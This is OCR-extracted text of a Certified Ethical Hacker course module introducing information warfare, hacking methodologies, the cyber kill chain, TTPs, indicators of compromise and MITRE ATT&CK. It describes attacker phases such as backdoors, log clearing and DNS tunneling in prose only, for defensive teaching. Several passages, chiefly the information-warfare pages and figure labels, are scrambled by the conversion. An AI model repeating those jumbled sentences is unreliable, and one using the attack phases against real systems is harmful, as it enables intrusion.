Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Introduction to Ethical Hacking
Information Warfare ‘@
¢ EH
The term information warfare or InfoWar refers to the use of information and communication technologies (ICT)
to gain competitive advantages over an opponent
{ Defensive Information Warfare
}
{ Offensive Information Warfare
Refers to all strategiesand actions designed to defend against attacks on ICT assets
ga
Defensive Warfare Pi
revention iti
Deterrence
Refers to information warfare thatinvolves attacks against the ICT assets of an opponent
'
|
wacom eas Web Server Attacks
Alerts @
}
Detection
Emergency
(MITM Attacks
Preparedness
System Hacking
Response
Information Warfare Source: https://iwar.org.uk
The term information warfare or InfoWar refers technologies (ICT) for competitive advantages warfare weapons include viruses, worms, nanomachines and microbes, electronic jamming,
to the use of information and communication over an opponent. Examples of information Trojan horses, logic bombs, trap doors, and penetration exploits and tools.
Martin Libicki divided information warfare into the following categories:
Intelligence-based warfare: Intelligence-based warfare is a sensor-based technology that directly corrupts technological systems. According to Libicki, “intelligence-based je design, protection, and denial of systems that he battlespace.
ctdomyus
=
ki, electronic warfare uses radio-electronic and communication. Radio electronic techniques information, whereas cryptographic techniques of sending information.
oy
Command and control warfare (C2 warfare): In the computer security industry, C2 warfare refers to the impact an attacker possesses over a compromised system or network that they control.
arfare is the use of various techniques such as e’s adversary in an attempt to succeed in battle.
¢r
=
e purpose of this type of warfare can vary from , theft of information, theft of services, system
Module 01 Page 11
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
monitoring, false messaging,
and access to data. Hackers generally use viruses, logic
bombs, Trojan horses, and sniffers to perform these attacks.
Economic warfare: Libicki notes that economic information warfare can affect the economy of a business or nation by blocking the flow of information. This could be especially devastating to organizations that do a lot of business in the digital world. Cyberwarfare: Libicki defines cyber warfare as the use of information systems against the virtual personas of individuals or groups. It is the broadest of all information warfare. It includes information terrorism, semantic attacks (similar to Hacker warfare,
but instead of harming a system, it takes over the system while maintaining the perception that it is operating correctly), and simula-warfare (simulated war, for example, acquiring weapons for mere demonstration rather than actual use). Each form of information warfare mentioned strategies. =
Defensive Information Warfare: attacks on ICT assets.
above consists of both defensive and offensive
Involves all strategies and actions to defend against
Offensive Information Warfare: Involves attacks against the ICT assets of an opponent. Defensive Warfare
p=
Prevention
Deterrence \
Alerts
@
betection
—
Emergency
=|
|BBq
—
Preparedness
Offensive Warfare
1
iN
Web Application Attacks
3
Web Server Attacks
° e
| c R
-
Malware Attacks
1
MITM Attacks
u
System Hacking
Response
p=
@ [=] F|
—
Figure 1.1: Block Diagram of Information Warfare
Module 01 Page 12
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#02: Explain Hacking Methodologies and Frameworks
copyright © by
Reproductions
Strictly Prohibited
Hacking Methodologies and Frameworks Learning the hacking methodologies and frameworks helps ethical hackers understand the phases involved in hacking attempts along with the tactics, techniques, and procedures used by real hackers. This knowledge further helps them in strengthening the security infrastructure of their organization. This section discusses various hacking methodologies such as the Certified Ethical Hacker (CEH) methodology, cyber kill chain methodology, MITRE attack framework, and Diamond Model of Intrusion Analysis.
Module 01 Page 13
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
CEH Hacking Methodology (CHM) System Hacking Gaining Access Cracking Passwords Vulnerability Exploitation
Scanning
Escalating Privileges Maintaining Access Executing Applications
Enumeration
; ke
Hiding Files Vulnerability Analysis
Clearing Logs Covering Tracks
CEH Hacking Methodology (CHM) EC-council’s CEH hacking methodology (CHM) defines the step-by-step process to perform ethical hacking. The CHM follows the same process as that of an attacker, and the only differences are in its hacking goals and strategies. This methodology helps security professionals and ethical hackers understand the various phases followed by real hackers in order to achieve their objectives. An understanding of the CHM helps ethical hackers learn various tactics, techniques, and tools used by attackers at various phases of hacking, which further guide them to succeed in the ethical hacking process.
Footprinting
System Hacking Gaining Access Cracking Passwords
Scanning
Vulnerability Exploitation Escalating Privileges
Enumeration
Vulnerability Analysis
:
Maintaining Access
Executing Applications
le _
Hiding Files Clearing Logs
Covering Tracks
Figure 1.2: EC-council’s CEH hacking methodology (CHM)
Module 01 Page 14
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
According to the CHM, the following are the various phases involved in hacking. Footprinting
Footprinting and reconnaissance constitute the preparatory phase, in which an attacker gathers as much information as possible about the target prior to launching an attack. In this phase, the attacker creates a profile of the target organization and obtains information such as its IP address range, namespace, and employees. Footprinting facilitates system hacking by revealing vulnerabilities. For example, the organization’s website may provide employee biographies or a personnel directory, which the hacker can use for social engineering. Conducting a Whois query on the web can provide information about the networks and domain names associated with a specific organization. The footprinting target range may include the target organization’s clients, employees, operations, network, and systems. Note: Footprinting Reconnaissance.
techniques
are
covered
in
Module
02:
Footprinting
and
Scanning
Scanning is used to identify active hosts, open ports, and unnecessary services enabled on particular hosts. In this phase, the attacker uses the details gathered during reconnaissance to scan the network for specific information. Scanning is a logical extension of active reconnaissance; in fact, some experts do not differentiate scanning from active reconnaissance. However, there is a slight difference in that scanning involves more in-depth probing by the attacker. Often, the reconnaissance and scanning phases overlap, and it is not always possible to separate them. Note: Scanning techniques are covered in Module 03: Scanning Networks. Enumeration Enumeration involves making active connections to a target system or subjecting it to direct queries. It is a method of intrusive probing through which attackers gather information such as network user lists, routing tables, security flaws, shared users, groups, applications, and banners.
Note: Enumeration techniques are covered in Module 04: Enumeration. Vulnerability Analysis Vulnerability assessment is the examination of the ability of a system or application, including its current security procedures and controls, to withstand assault. It recognizes, measures, and classifies security vulnerabilities in computer systems, networks, and communication channels. Attackers perform vulnerability analysis to identify security loopholes in the target organization’s network, communication infrastructure, and end systems. The identified vulnerabilities are used by attackers to perform further exploitation of the target network. Note: Vulnerability Analysis. Module 01 Page 15
assessment
concepts
are
discussed
in Module
05:
Vulnerability
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
System Hacking Attackers follow a certain methodology to hack a system. They first obtain information during the footprinting, scanning, enumeration, and vulnerability analysis phases, which they then use to exploit the target system. o
Gaining Access
This is the phase in which actual hacking occurs. The previous phases help attackers identify security loopholes and vulnerabilities in the target organizational IT assets. Attackers use this information, along with techniques such as password cracking and the exploitation of vulnerabilities including buffer overflows, to gain access to the target organizational system. Gaining access refers to the point at which the attacker obtains access to the operating system (OS) or applications on a computer or network. A hacker’s chances of gaining access to a target system depend on several factors, such as the architecture and configuration of the target system, the perpetrator’s skill level, and the initial level of access obtained. Once an attacker gains access to the target system, they attempt to escalate privileges to obtain complete control. In this process, they also compromise the intermediate systems connected to it. Escalating Privileges After gaining access to a system using a low-privilege user account, the attacker may attempt to increase their privileges to the administrator level to perform protected system operations so that they can proceed to the next level of the system hacking phase, which is the execution of applications. The attacker exploits known system vulnerabilities to escalate user privileges. Maintaining Access
Maintaining access refers to the phase in which an attacker attempts to retain ownership of the system. Once an attacker gains access to the target system with admin- or root-level privileges (thus owning the system), they can use both the system and its resources at will. The attacker can either use the system as a launchpad to scan and exploit other systems or maintain a low profile and continue exploitation. Both of these actions can cause significant damage. Attackers can upload, download, or manipulate data, applications, and configurations on the owned system and also use malicious software to transfer usernames, passwords, and any other information stored in the system. They can maintain control over the system for a long time by closing vulnerabilities to prevent other hackers from exploiting them. Occasionally, in the process, the attacker may provide some degree of protection to the system from other attacks. Attackers use compromised systems to launch further attacks.
Module 01 Page 16
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking o
Exam 312-50 Certified Ethical Hacker
Clearing Logs To remain undetected, it is important for attackers to erase all the evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.
Note: The complete system hacking process is covered in Module 06: System Hacking.
Module 01 Page 17
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Cyber Kill Chain Methodology
@ The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities @ It provides greater insight into attack phases, which helps security professionals to understand the adversary’s tactics, techniques, and procedures beforehand Createa deliverable ‘malicious payload using an exploit and a backdoor Weaponization
Reconnaissance Gather data on the target to probe for weak points
Exploit a vulnerability by executing code on the victim's system Exploitation
Delivery Send weaponized bundle to the victim using email, USB, etc.
Create a command and control channel to communicateand ppass data back and forth Command and Control
Installation Install malware on the target system
Actions on Objectives Perform actions to achieve intended objectives/goals
Cyber Kill Chain Methodology The cyber kill chain methodology is a component of intelligence-driven defense for the identification and prevention of malicious intrusion activities. This methodology helps security professionals in identifying the steps that adversaries follow in order to accomplish their goals. The cyber kill chain is a framework developed for securing cyberspace based on the concept of military kill chains. This method aims to actively enhance intrusion detection and response. The cyber kill chain is equipped with a seven-phase protection mechanism to mitigate and reduce cyber threats. According to Lockheed Martin, cyberattacks might occur in seven different phases, from reconnaissance to the final accomplishment of the objective. An understanding of cyber kill chain methodology helps security professionals to leverage security controls at different stages of an attack and helps them to prevent the attack before it succeeds. It also provides greater insight into the attack phases, which helps in understanding the adversary’s TTPs beforehand.
Module 01 Page 18
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Discussed below are various phases included in cyber kill chain methodology: Create a deliverable
Exploit a vulnerability
Create a command and control
an exploit and a backdoor
the victim’s system
pass data back and forth
malicious payload using Weaponization
Reconnaissance Gather data on the target to probe for weak points
by executing code on
channel to communicate and
Exploitation
Delivery Send weaponized bundle to the victim using email, USB, etc.
Command and Control
Installation Install malware on the target system
Actions on Objectives Perform actions to achieve intended objectives/goals
Figure 1.3: Cyber kill chain methodology
=
Reconnaissance An adversary performs reconnaissance to collect as much information about the target as possible to probe for weak points before actually attacking. They look for information such as publicly available information on the Internet, network information, system information, and the organizational information of the target. By conducting reconnaissance across different network levels, the adversary can gain information such as network blocks, specific IP addresses, and employee details. The adversary may use automated tools to obtain information such as open ports and services, vulnerabilities in applications, and login credentials. Such information can help the adversary in gaining backdoor access to the target network. Activities of the adversary include the following:
=
o
Gathering information about the target organization by searching the Internet or through social engineering
o
Performing analysis of various online activities and publicly available information
o
Gathering information from social networking sites and web services
o
Obtaining information about websites visited
o
Monitoring and analyzing the target organization’s website
o
Performing Whois, DNS, and network footprinting
o
Performing scanning to identify open ports and services
Weaponization
The adversary analyzes the data collected in the previous stage to identify the vulnerabilities and techniques that can exploit and gain unauthorized access to the target organization. Based on the vulnerabilities identified during analysis, the adversary selects or creates a tailored deliverable malicious payload (remote-access malware
Module 01 Page 19
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
weapon) using an exploit and a backdoor to send it to the victim. An adversary may target specific network devices, operating systems, endpoint devices, or even individuals within the organization to carry out their attack. For example, the adversary may send a phishing email to an employee of the target organization, which may include a malicious attachment such as a virus or worm that, when downloaded, installs a backdoor on the system that allows remote access to the adversary. The following are the activities of the adversary:
=
o
Identifying appropriate malware payload based on the analysis
o
Creating a new malware payload or selecting, reusing, modifying the available malware payloads based on the identified vulnerability
o
Creating a phishing email campaign
o
Leveraging exploit kits and botnets
Delivery The previous stage included creating a weapon. Its payload is transmitted to the intended victim(s) as an email attachment, via a malicious link on websites, or through a vulnerable web application or USB drive. Delivery is a key stage that measures the effectiveness of the defense strategies implemented by the target organization based on whether the intrusion attempt of the adversary is blocked or not. The following are the activities of the adversary:
=
o
Sending phishing emails to employees of the target organization
o
Distributing USB drives containing malicious payload to employees of the target organization
o
Performing attacks such as watering hole on the compromised website
o
Implementing various hacking tools against the operating systems, applications, and servers of the target organization
Exploitation After the weapon is transmitted to the intended victim, exploitation triggers the adversary’s malicious code to exploit a vulnerability in the operating system, application, or server on a target system. At this stage, the organization may face threats such as authentication and authorization attacks, arbitrary code execution, physical security threats, and security misconfiguration.
Activities of the adversary include the following: o
Exploiting software or hardware vulnerabilities to gain remote access to the target
system
Module 01 Page 20
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking =
Exam 312-50 Certified Ethical Hacker
Installation The adversary downloads and installs more malicious software on the target system to maintain access to the target network for an extended period. They may use the weapon to install a backdoor to gain remote access. After the injection of the malicious code on one target system, the adversary gains the capability to spread the infection to other end systems in the network. Also, the adversary tries to hide the presence of malicious activities from security controls like firewalls using various techniques such as encryption.
The following are the activities of the adversary:
=
o
Downloading and installing malicious software such as backdoors
o
Gaining remote access to the target system
o
Leveraging various methods to keep backdoor hidden and running
©
Maintaining access to the target system
Command and Control The adversary creates a command and control channel, which establishes two-way communication between the victim’s system and adversary-controlled server to communicate and pass data back and forth. The adversaries implement techniques such as encryption to hide the presence of such channels. Using this channel, the adversary performs remote exploitation on the target system or network. The following are the activities of the adversary:
=
o
Establishing a two-way communication channel between the victim’s system and the adversary-controlled server
o
Leveraging channels such as web traffic, email communication, and DNS messages.
o
Applying privilege escalation techniques
o
Hiding any evidence of compromise using techniques such as encryption
Actions on Objectives
The adversary controls the victim’s system from a remote location and finally accomplishes their intended goals. The adversary gains access to confidential data, disrupts the services or network, or destroys the operational capability of the target by gaining access to its network and compromising more systems. Also, the adversary may use this as a launching point to perform other attacks.
Module 01 Page 21
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Tactics, Techniques, and Procedures (TTPs)
CEH
:
| The term Tactics, Techniques, and Procedures (TTPs) refers to the patterns of activities and methods associated | with specific threat actors or groups of threat actors
4
L
@
“Tactics” are the guidelines that
describe the way an attacker performs the attack from
|@ This guideline consists of the various tactics for information gathering to perform initial exploitation, privilege escalation, and lateral movement, and to deploy measures for persistent access to the system and other
Tactics, Techniques,
@
“Techniques” are the technical
methods used by an attacker
@
e These techniques include initial exploitation, setting up and maintainingcommand and control channels, accessing the
“Procedures” are organizational
approaches that threat actors follow to launch an attack
to achieve intermediate results
during the attack
beginningto the end
purposes
Procedures
Techniques
Tactics
;
@ The number of actions usually differs dependingon the objectives of the procedure and threat actor group
target infrastructure, covering
the tracks of data exfiltration, and others
and Procedures (TTPs)
The terms “tactics, techniques, and procedures” refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors. TTPs are helpful in analyzing threats and profiling threat actors and can further be used to strengthen the security infrastructure of an organization. The word “tactics” is defined as a guideline that describes the way an attacker performs their attack from beginning to end. The word “techniques” is defined as the technical methods used by an attacker to achieve intermediate results during their attack. Finally, the word “procedures” is defined as the organizational approach followed by the
threat actors to launch their attack. In order to understand and defend against the threat actors, it is important to understand the TTPs used by adversaries. Understanding the tactics of an attacker helps to predict and detect evolving threats in the early stages. Understanding the techniques used by attackers helps to identify vulnerabilities and implement defensive measures in advance. Lastly, analyzing the procedures used by the attackers helps to identify what the attacker is looking for within the target organization’s infrastructure. Organizations should understand TTPs to protect their network against threat actors and upcoming attacks. TTPs enable the organizations to stop attacks at the initial stage, thereby protecting the network against massive damages. =
Tactics Tactics describe the way the threat actor operates during different phases of an attack. It consists of the various tactics used to gather information
for the initial exploitation,
perform privilege escalation and lateral movement, and deploy measures for persistence access to the system. Generally, APT groups depend on a certain set of unchanging tactics, but in some cases, they adapt to different circumstances and alter
Module 01 Page 22
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
the way they perform their attacks. Therefore, the difficulty of detecting and attributing the attack campaign depends on the tactics used to perform the attack.
An organization can profile threat actors based on tactics they use; this consists of the way they gather information about a target, the methods they follow for initial compromise, and the number of entry points they use while attempting to enter the target network. For example, to obtain information, some threat actors depend solely on information available on the Internet, whereas others might perform social engineering or use connections in intermediate organizations. Once information such as the email addresses of employees of the target organization is gathered, the threat actors either choose to approach the target one by one or as a group. Furthermore, the attackers’ designed payload can stay constant from the beginning to the end of the attack or may be changed based on the targeted individual. Therefore, to understand the threat actors better, tactics used in the early stages of an attack must be analyzed properly.
Another method of analyzing the APT groups is inspecting the infrastructure and tools used to perform their attack. For example, consider establishing a command and control channel on the servers controlled by the attacker. These C&C servers may be located within a specific geographical location or may spread across the Internet and can be static or can change dynamically. It is also important to analyze the tools used to perform the attack. This includes analyzing the exploits and tools used by various APT groups. In such a scenario, a sophisticated threat actor may exploit many zero-day vulnerabilities by using adapted tools and obfuscation methods. However, this might be difficult as less-sophisticated threat actors generally depend on publicly known vulnerabilities and open-source tools. Identifying this type of tactic helps in profiling the APT groups and building defensive measures in advance. In some cases, understanding the tactics used in the last stages of an attack helps in profiling the threat actor. Also, the methods used to cover the tracks help the target organization understand attack campaigns. Analyzing the tactics used by the attackers helps in creating an initial profile by understanding different phases of an APT life cycle. This profile helps in performing further analysis of the techniques and procedures used by the attackers. An attacker may continually change the TTPs used, so it is important to constantly review and update the tactics used by the APT groups. =
Techniques To launch an attack successfully, threat actors use several techniques during its execution. These techniques include initial exploitation, setting up and maintaining command and control channels, accessing the target infrastructure, and covering the tracks of data exfiltration. The techniques followed by the threat actor to conduct an attack might vary, but they are mostly similar and can be used for profiling. Therefore, understanding the techniques used in the different phases of an attack is essential to analyzing the threat groups effectively.
Module 01 Page 23
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
Techniques can also be analyzed at each stage of the threat life cycle. Therefore, the techniques at the initial stage mainly describe the tools used for information gathering and initial exploitation. The techniques used in this stage need not necessarily have a technical aspect. For example, in social engineering, certain non-technical software tools are used as an effective way of gathering information. An attacker can use such tools to obtain the email addresses of target organization employees through publicly available
resources.
In the same manner, purely human-based social engineering can be used to perform the initial exploitation. For example, consider a scenario where the victim is tricked via a phone call to reveal their login credentials for accessing the target organization’s internal network. These techniques are used in the initial phase of an attack to gather information about the target and break the first line of defense.
Techniques used in the middle stages of an attack mostly depend on technical tools for initially escalating privileges on systems that are compromised or performing lateral movements within the target organization’s network. At this stage of an attack, the attackers use various exploits or misuse configuration vulnerabilities on the target system. They may also exploit network design flaws to gain access to other systems in the network. In all of these cases, either exploits or a collection of tools allows the attacker to perform a successful attack. In this scenario, the term “technique” is the set of tools and
the way they are used
to obtain
intermediate
results during
an attack
The techniques in the last stage of an attack can have both technical and nontechnical aspects. In such a scenario, the techniques used for data-stealing are usually based on network technology and encryption. For example, the threat actor encrypts the stolen files, transfers them through the established command and control channel, and copies them to their own system. After successfully executing the attack and transferring the files, the attacker follows certain purely technical techniques to cover their tracks. They use automated software tools to clear logs files to evade detection. After aggregating the techniques used in all the stages of an attack, the organization can use the information to profile the threat actors. In order to make an accurate attribution of threat actors, the organization must observe all the techniques used by its adversaries.
=
Procedures “Procedures” involve a sequence of actions performed by the threat actors different steps of an attack life cycle. The number of actions usually differs upon the objectives of the procedure and the APT group. An advanced threat advanced procedures that consist of more actions than a normal procedure the same intermediate result. This is done mainly to increase the success attack and decrease the probability of detection by security mechanisms.
to execute depending actor uses to achieve rate of an
For example, in a basic procedure of information gathering, an actor information about the target organization; identifies key targets, employees;
Module 01 Page 24
collects collects
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
their contact details, identifies vulnerable systems and potential entry points to the target network, and documents all the collected information. The further actions of an adversary depend on the tactics used. These actions include extensive research and repeated information gathering to collect in-depth and up-to-date information on the target individuals via social networking sites. This information can assist threat actors in performing spear phishing, monitoring security controls to identify zero-day exploits in the target systems, and other tasks. For example, a threat actor using a more detailed procedure executes the malware payload. At the time of execution, the malicious code decrypts itself, evades security monitoring controls, deploys persistence, and establishes a command and control channel for communicating with the victim system. This type of procedure is common for malware, where different threat actors may implement the same feature, and hence it is useful in forensic investigations. An understanding and proper analysis of the procedures followed by certain threat actors during an attack helps organizations profile threat actors. In the initial stage of an attack, such as during information gathering, observing the procedure of an APT group is difficult. However, the later stages of an attack can leave trails that may be used to understand the procedures the attacker followed.
Adversary Behavioral Identification Adversary behavioral identification involves the identification of the common methods or techniques followed by an adversary to launch attacks to penetrate an organization’s network. It gives security professionals insight into upcoming threats and exploits. It helps them plan network security infrastructure and adapt a range of security procedures as prevention against various cyberattacks. Given below are some of the behaviors detection capabilities of security devices: Internal
of an adversary that can
be used to enhance
the
Reconnaissance
Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance. This includes the enumeration of systems, hosts, processes, the execution of various commands to find out information such as the local user context and system configuration, hostname, IP addresses, active remote systems, and programs running on the target systems. Security professionals can monitor the activities of an adversary by checking for unusual commands executed in the Batch scripts and PowerShell and by using packet capturing tools.
Use of PowerShell PowerShell can be used by an adversary as a tool for automating data exfiltration and launching further attacks. To identify the misuse of PowerShell in the network, security professionals can check PowerShell’s transcript logs or Windows Event logs. The user agent string and IP addresses can also be used to identify malicious hosts who try to exfiltrate data.
Module 01 Page 25
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking =
Exam 312-50 Certified Ethical Hacker
Unspecified Proxy Activities An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection. Security professionals can find unspecified domains by checking the data feeds that are generated by those domains. Using this data feed, the security professionals can also find any malicious files downloaded and the unsolicited communication with the outside network based on the domains.
=
Use of Command-Line Interface On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code. Security professionals can identify this behavior of an adversary by checking the logs for process ID, processes having arbitrary letters and numbers, and malicious files downloaded from the Internet.
"HTTP User Agent In HTTP-based communication, the server identifies the connected HTTP client using the user agent field. An adversary modifies the content of the HTTP user agent field to communicate with the compromised system and to carry further attacks. Therefore, security professionals can identify this attack at an initial stage by checking the content of the user agent field.
=
Command and Control Server Adversaries use command and control servers to communicate remotely with compromised systems through an encrypted session. Using this encrypted channel, the adversary can steal data, delete data, and launch further attacks. Security professionals can detect compromised hosts or networks by identifying the presence of a command and control server by tracking network traffic for outbound connection attempts, unwanted open ports, and other anomalies.
=
Use of DNS Tunneling Adversaries use DNS tunneling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network. Using DNS tunneling, an adversary can also communicate with the command and control server, bypass security controls, and perform data exfiltration. Security professionals can identify DNS tunneling by analyzing malicious DNS requests, DNS payload, unspecified domains, and the destination of DNS requests.
=
Use of Web Shell An adversary uses a web shell to manipulate the web server by creating a shell within a website; it allows an adversary to gain remote access to the functionalities of a server. Using a web shell, an adversary performs various tasks such as data exfiltration, file transfers, and file uploads. Security professionals can identify the web shell running in
Module 01 Page 26
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
the network by analyzing server access, error logs, suspicious encoding, user agent strings, and through other methods. =
strings that
indicate
Data Staging
After successful penetration into a target’s network, the adversary uses data staging techniques to collect and combine as much data as possible. The types of data collected by an adversary include sensitive data about the employees and customers, the business tactics of an organization, financial information, and network infrastructure information. Once collected, the adversary can either exfiltrate or destroy the data. Security professionals can detect data staging by monitoring network traffic for malicious file transfers, file integrity monitoring, and event logs. Indicators of Compromise
(IoCs)
Cyber threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of loCs to effectively and efficiently detect and respond to evolving cyber threats. Indicators of Compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization’s infrastructure. However, loCs are not intelligence; rather, loCs act as a good source of information about threats that serve as data points in the intelligence process. Actionable threat intelligence extracted from loCs helps organizations enhance incident-handling strategies. Cybersecurity professionals use various automated tools to monitor loCs to detect and prevent various security breaches to the organization. Monitoring loCs also helps security teams enhance the security controls and policies of the organization to detect and block suspicious traffic to thwart further attacks. To overcome the threats associated with loCs, some organizations like STIX and TAXII have developed standardized reports that contain condensed data related to attacks and shared it with others to leverage the incident response. An loC is an atomic indicator, computed indicator, or behavioral indicator. It is the information regarding suspicious or malicious activities that is collected from various security establishments in a network’s infrastructure. Atomic indicators are those that cannot be segmented into smaller parts, and whose meaning is not changed in the context of an intrusion. Examples of atomic indicators are IP addresses and email addresses. Computed indicators are obtained from the data extracted from a security incident. Examples of computed indicators are hash values and regular expressions. Behavioral indicators refer to a grouping of both atomic and computed indicators, combined on the basis of some logic.
Categories of Indicators of Compromise The cybersecurity professionals must have proper knowledge about various possible threat actors and their tactics related to cyber threats, mostly called Indicators of Compromise (loCs). This understanding of loCs helps security professionals quickly detect the threats entering the organization and protect the organization from evolving threats.
Module 01 Page 27
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
For this purpose, loCs are divided into four categories: Email Indicators Attackers usually prefer email services to send malicious data to the target organization or individual. Such socially engineered emails are preferred due to their ease of use and comparative anonymity. Examples of email indicators include the sender’s email address, email subject, and attachments or links. Network Indicators Network indicators are useful for command and control, malware delivery, and identifying details about the operating system, browser type, and other computerspecific information. Examples of network indicators include URLs, domain names, and IP addresses.
Host-Based Indicators Host-based indicators are found by performing an analysis of the infected system within the organizational network. Examples of host-based indicators include filenames, file hashes, registry keys, DLLs, and mutex. Behavioral Indicators Generally, typical loCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MD5 hash, and domain names. Behavioral loCs are used to identify specific behavior related to malicious activities such as code injection into the memory or running the scripts of an application. Well-defined behaviors enable broad protection to block all current and future malicious activities. These indicators are useful to identify when legitimate system services are used for abnormal or unexpected activities. Examples of behavioral indicators include document executing PowerShell script, and remote command execution. Listed below are some of the key Indicators of Compromise (loCs): Unusual outbound network traffic Unusual activity through a privileged user account Geographical anomalies Multiple login failures Increased database read volume
Large HTML response size Multiple requests for the same file Mismatched port-application traffic Suspicious registry or system file changes Unusual DNS requests Unexpected patching of systems Module 01 Page 28
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
=
Signs of Distributed Denial-of-Service (DDoS) activity
=
Bundles of data in the wrong places
=
Web traffic with superhuman behavior
Module 01 Page 29
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Introduction to Ethical Hacking
Exam 312-50 Certified Ethical Hacker
MITRE ATT&CK Framework 1 |
CE H
MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations
2 | The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, government, and the cybersecurity product and service community | 3 |
The 14 tactic categories within ATT&CK for Enterprise are derived from the later stages (exploit, control, maintain, and
execute) of the seven stages of the Cyber Kill Chain
Recon
Weaponize
Deliver
Exploit
PRE-ATT&CK
Control
Execute
Enterprise ATT&CK
Copyright © by
MITRE ATT&CK
Maintain
ttes://attock mitre.org Al RightsReserved, Reproduction i Strictly Prohibited.
Framework
Source: https://attack.mitre.org MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community. MITRE ATT&CK comprises three collections of tactics and techniques, called Enterprise, Mobile, and PRE-ATT&CK matrices, as each collection is represented in a matrix form. ATT&CK for Enterprise contains 14 categories of tactics, which are derived from the later stages (exploit, control, maintain, and execute) of the seven-stage Cyber Kill Chain. This provides a deeper level of granularity in describing what can occur during an intrusion.
Recon
Weaponize
Deliver
‘
PRE-ATT&CK
Exploit
Control
Execute
Maintain
i
Enterprise ATT&CK Figure 1.4: MITRE Attack Framework
The following are the tactics in ATT&CK for Enterprise =
Reconnaissance
=
Resource Development
=
Initial Access
Module 01 Page 30
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Introduction to Ethical Hacking
=
Execution
=
Persistence
=
Privilege Escalation
=
Defense Evasion
=
Credential Access
=
Discovery
=
Lateral Movement
=
Collection
=
Command and Control
=
Exfiltration
=
Impact
Some MITRE ATT&CK for Enterprise Use Cases:
=
Prioritize development and acquisition efforts for computer network defense capabilities.
=
Conduct analyses of alternatives between network defense capabilities.
=
Determine “coverage” of a set of network defense capabilities.
=
